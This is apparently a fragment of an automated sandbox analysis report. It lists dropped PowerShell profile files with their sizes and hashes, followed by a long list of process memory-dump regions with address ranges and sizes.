aa1bccce9e8e0f6bc79b3b1530b4b7af2b2fe5218eeee0a1b195c2ef8d5013d3

SHA512
5e9ad5dcb2f01246625873f9df6bb6b795b3e2dd0042ee2a68c4f62b72842bc66a1733b3d837f27ffd4421aa6a04e4596b52da13b103f3edcde899fc520788db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
160B

MD5
434cb5416f1f7c0b905154f35ff9514f

SHA1
892ffea6166bd38bad6fef7e34273907c9705479

SHA256
5c3d77da6c4d44878cc3abc33d1bed308c6c8eac266600706ea7f8678b75e7d5

SHA512
f15273e5033db1fabcfec37f3a2d26732db0f16bb02ebb4fc2e1abe7303cb9fcc3da144cd575328f0fba535ed0bb3012fba5322ded8c44361c00b72aa92ec031

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ba259d3504a7ca319fa779819e1bd7a8

SHA1
7d3f6907c85e7205d2011c51037aae3263307ade

SHA256
669c0b79ecab65c1c02effa1fc7fef6af83161f5c0990b10edc37462d6f17400

SHA512
ae57c02c09c5afa2365447014b028c2c89fa5c8726dc66c0cff237071c27a954170b8b4e091d2cfe4cacd7785cec7d496eaee11d517affb41fe6712a5c73b567

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4ab88e9b211f12a845b3ab6df9a38158

SHA1
67ca52f85b993bb4d8d46160cfdd0d1798bb8863

SHA256
830fc6a1faebd59a3fe3eea87935a1844afd1bf4018c83a7547067c6c65f444f

SHA512
a38df6e76d2080211514d59924b166e20b73490858f05af27dc6a4cd22b8d432e5998341752b508a915348e34156345525b4bfa9c37cd8963c98bf59db5b95ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4ab88e9b211f12a845b3ab6df9a38158

SHA1
67ca52f85b993bb4d8d46160cfdd0d1798bb8863

SHA256
830fc6a1faebd59a3fe3eea87935a1844afd1bf4018c83a7547067c6c65f444f

SHA512
a38df6e76d2080211514d59924b166e20b73490858f05af27dc6a4cd22b8d432e5998341752b508a915348e34156345525b4bfa9c37cd8963c98bf59db5b95ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2ed7da88699b4931a8670586791a5e52

SHA1
c501f4e9de0838e7659094db0be9ccbc7542f07b

SHA256
02c5cbe16229af2b7406ae913e31adec5711700e6cf3d0ac33bec47ad6962396

SHA512
52c644dff609e7db4df4eea8ac6498e335bd5f1a44ea45259f78c72012b2aff6e314780f8cbde94832df791b188b0b429155d6790b8bf1bd7a234767c8ba295d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2ed7da88699b4931a8670586791a5e52

SHA1
c501f4e9de0838e7659094db0be9ccbc7542f07b

SHA256
02c5cbe16229af2b7406ae913e31adec5711700e6cf3d0ac33bec47ad6962396

SHA512
52c644dff609e7db4df4eea8ac6498e335bd5f1a44ea45259f78c72012b2aff6e314780f8cbde94832df791b188b0b429155d6790b8bf1bd7a234767c8ba295d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a36866c1b618c00280b8182a4b6b436e

SHA1
0ef3426990c0fab93ccac60af9d3a1b98977d0b0

SHA256
b03f6bb530a12abd06c65b7db96b479c9361905ba9df07a21c0d4f9d5a85f088

SHA512
2e9e3f5062bf9bc83faf486ddd3babde2a4cf017ba3a13d9831b3630c8cafbe713352959c0976c2795ed9cbec206d334bf987813460b2bf3471a341901a92996

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a36866c1b618c00280b8182a4b6b436e

SHA1
0ef3426990c0fab93ccac60af9d3a1b98977d0b0

SHA256
b03f6bb530a12abd06c65b7db96b479c9361905ba9df07a21c0d4f9d5a85f088

SHA512
2e9e3f5062bf9bc83faf486ddd3babde2a4cf017ba3a13d9831b3630c8cafbe713352959c0976c2795ed9cbec206d334bf987813460b2bf3471a341901a92996

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4dd5160ba1d9de1b87532f96f7c8e935

SHA1
98ba631c25cae0bc559e9279295c0dc0e0f3e621

SHA256
5905768ae4e9831504752b8d8412f6178c2181c43c79a7b616404cde3a730d07

SHA512
c079224a1f66aaa6ad1839689fe15d67dd3197eae52bccb66cbcfdf9a72936c256ddcfc32fd008865f5483e42239fe968d1c57cd5c50e2e04ebca331f6c6448e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4dd5160ba1d9de1b87532f96f7c8e935

SHA1
98ba631c25cae0bc559e9279295c0dc0e0f3e621

SHA256
5905768ae4e9831504752b8d8412f6178c2181c43c79a7b616404cde3a730d07

SHA512
c079224a1f66aaa6ad1839689fe15d67dd3197eae52bccb66cbcfdf9a72936c256ddcfc32fd008865f5483e42239fe968d1c57cd5c50e2e04ebca331f6c6448e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
da0e0a6e24da1af0bd675882aea124ec

SHA1
d327ae9fb1473cf12fac576d3357e1691374d2fb

SHA256
2e4b7d1388892b37a7a3439a493bb1bda307a7bce3b26e505819f52ae15cdcb2

SHA512
2e8cb43d2d6658795d6cd7eb0e4ea7e82ed752c7b10be9e708a8c9ca6a7892412eb52b567f9090fd7e6212938d664b126be4ef464f379e34c8e940bf2416d4b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
da0e0a6e24da1af0bd675882aea124ec

SHA1
d327ae9fb1473cf12fac576d3357e1691374d2fb

SHA256
2e4b7d1388892b37a7a3439a493bb1bda307a7bce3b26e505819f52ae15cdcb2

SHA512
2e8cb43d2d6658795d6cd7eb0e4ea7e82ed752c7b10be9e708a8c9ca6a7892412eb52b567f9090fd7e6212938d664b126be4ef464f379e34c8e940bf2416d4b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0ae41d124502d0b4c473f83ad1ae56cf

SHA1
0b30fcefcd0030c5420af01b9b4a4c8a17dae36a

SHA256
b5f396a225df538191580be1bdaf9f5c1820747f766b7b9af83bb2bf7c5b37cb

SHA512
7ad63014fbe8ff5be63a9cf716ab728ced42230a402e5a9d91a2d019d78f4fdc719cbab0a583c345081a0c53603359d9a89835885b65947d1a17fc97e22edbeb

Download Submit
memory/8-456-0x0000000000000000-mapping.dmp

Download
memory/8-473-0x000001D0B9DD3000-0x000001D0B9DD5000-memory.dmp

Filesize
8KB

Download
memory/8-474-0x000001D0B9DE0000-0x000001D0B9DF2000-memory.dmp

Filesize
72KB

Download
memory/8-472-0x000001D0B9DD0000-0x000001D0B9DD2000-memory.dmp

Filesize
8KB

Download
memory/164-177-0x0000000000000000-mapping.dmp

Download
memory/308-451-0x000001B73E180000-0x000001B73E182000-memory.dmp

Filesize
8KB

Download
memory/308-452-0x000001B73E183000-0x000001B73E185000-memory.dmp

Filesize
8KB

Download
memory/316-476-0x000000000040C74E-mapping.dmp

Download
memory/376-387-0x000001D7BCF90000-0x000001D7BCF92000-memory.dmp

Filesize
8KB

Download
memory/376-388-0x000001D7BCF93000-0x000001D7BCF95000-memory.dmp

Filesize
8KB

Download
memory/824-378-0x0000000000000000-mapping.dmp

Download
memory/1136-229-0x000000000040C74E-mapping.dmp

Download
memory/1136-242-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
memory/1136-246-0x0000000006B50000-0x0000000006BE2000-memory.dmp

Filesize
584KB

Download
memory/1136-241-0x0000000006070000-0x000000000656E000-memory.dmp

Filesize
5.0MB

Download
memory/1136-240-0x0000000005AD0000-0x0000000005B6C000-memory.dmp

Filesize
624KB

Download
memory/1136-244-0x0000000000D60000-0x0000000000D88000-memory.dmp

Filesize
160KB

Download
memory/1136-243-0x0000000006930000-0x00000000069A6000-memory.dmp

Filesize
472KB

Download
memory/1136-245-0x0000000001200000-0x000000000121E000-memory.dmp

Filesize
120KB

Download
memory/1136-228-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1292-363-0x000000000040C74E-mapping.dmp

Download
memory/1448-204-0x0000000000000000-mapping.dmp

Download
memory/2256-277-0x000001E705A30000-0x000001E705A40000-memory.dmp

Filesize
64KB

Download
memory/2256-279-0x000001E707870000-0x000001E707882000-memory.dmp

Filesize
72KB

Download
memory/2256-278-0x000001E705A30000-0x000001E705A40000-memory.dmp

Filesize
64KB

Download
memory/2256-261-0x0000000000000000-mapping.dmp

Download
memory/2812-122-0x0000013B17B50000-0x0000013B17B72000-memory.dmp

Filesize
136KB

Download
memory/2812-134-0x0000013B17A16000-0x0000013B17A18000-memory.dmp

Filesize
8KB

Download
memory/2812-133-0x0000013B17A13000-0x0000013B17A15000-memory.dmp

Filesize
8KB

Download
memory/2812-132-0x0000013B17A10000-0x0000013B17A12000-memory.dmp

Filesize
8KB

Download
memory/2812-125-0x0000013B30050000-0x0000013B300C6000-memory.dmp

Filesize
472KB

Download
memory/3176-389-0x0000021075C20000-0x0000021075C22000-memory.dmp

Filesize
8KB

Download
memory/3176-379-0x0000000000000000-mapping.dmp

Download
memory/3176-390-0x0000021075C23000-0x0000021075C25000-memory.dmp

Filesize
8KB

Download
memory/3192-455-0x0000000000000000-mapping.dmp

Download
memory/3272-258-0x0000000000000000-mapping.dmp

Download
memory/3628-259-0x000001FD215D0000-0x000001FD215D2000-memory.dmp

Filesize
8KB

Download
memory/3628-260-0x000001FD215D3000-0x000001FD215D5000-memory.dmp

Filesize
8KB

Download
memory/3748-223-0x000001E19B113000-0x000001E19B115000-memory.dmp

Filesize
8KB

Download
memory/3748-225-0x000001E1B38E0000-0x000001E1B38FA000-memory.dmp

Filesize
104KB

Download
memory/3748-208-0x0000000000000000-mapping.dmp

Download
memory/3748-222-0x000001E19B110000-0x000001E19B112000-memory.dmp

Filesize
8KB

Download
memory/3748-224-0x000001E19B150000-0x000001E19B162000-memory.dmp

Filesize
72KB

Download
memory/3892-400-0x000000000040C74E-mapping.dmp

Download
memory/4016-163-0x0000000000000000-mapping.dmp

Download
memory/4016-170-0x00000264FD1E0000-0x00000264FD1E2000-memory.dmp

Filesize
8KB

Download
memory/4016-171-0x00000264FD1E3000-0x00000264FD1E5000-memory.dmp

Filesize
8KB

Download
memory/4016-188-0x00000264FD1E6000-0x00000264FD1E8000-memory.dmp

Filesize
8KB

Download
memory/4088-190-0x000002B2BBDF0000-0x000002B2BBDF2000-memory.dmp

Filesize
8KB

Download
memory/4088-191-0x000002B2BBDF3000-0x000002B2BBDF5000-memory.dmp

Filesize
8KB

Download
memory/4100-281-0x000000000040C74E-mapping.dmp

Download
memory/4200-418-0x0000025274583000-0x0000025274585000-memory.dmp

Filesize
8KB

Download
memory/4200-416-0x0000025274580000-0x0000025274582000-memory.dmp

Filesize
8KB

Download
memory/4372-295-0x000001981CFD3000-0x000001981CFD5000-memory.dmp

Filesize
8KB

Download
memory/4372-293-0x000001981CFD0000-0x000001981CFD2000-memory.dmp

Filesize
8KB

Download
memory/4524-298-0x0000000000000000-mapping.dmp

Download
memory/4524-438-0x000000000040C74E-mapping.dmp

Download
memory/4536-311-0x0000019D732E3000-0x0000019D732E5000-memory.dmp

Filesize
8KB

Download
memory/4536-299-0x0000000000000000-mapping.dmp

Download
memory/4536-310-0x0000019D732E0000-0x0000019D732E2000-memory.dmp

Filesize
8KB

Download
memory/4544-415-0x0000000000000000-mapping.dmp

Download
memory/4628-434-0x00000147BCE20000-0x00000147BCE22000-memory.dmp

Filesize
8KB

Download
memory/4628-436-0x00000147BCE10000-0x00000147BCE22000-memory.dmp

Filesize
72KB

Download
memory/4628-435-0x00000147BCE23000-0x00000147BCE25000-memory.dmp

Filesize
8KB

Download
memory/4628-417-0x0000000000000000-mapping.dmp

Download
memory/4692-318-0x000000000040C74E-mapping.dmp

Download
memory/4872-349-0x0000022F1C580000-0x0000022F1C582000-memory.dmp

Filesize
8KB

Download
memory/4872-350-0x0000022F1C583000-0x0000022F1C585000-memory.dmp

Filesize
8KB

Download
memory/5040-337-0x0000000000000000-mapping.dmp

Download
memory/5060-338-0x0000000000000000-mapping.dmp

Download
memory/5060-351-0x000001C6191E0000-0x000001C6191E2000-memory.dmp

Filesize
8KB

Download
memory/5060-352-0x000001C6191E3000-0x000001C6191E5000-memory.dmp

Filesize
8KB

Download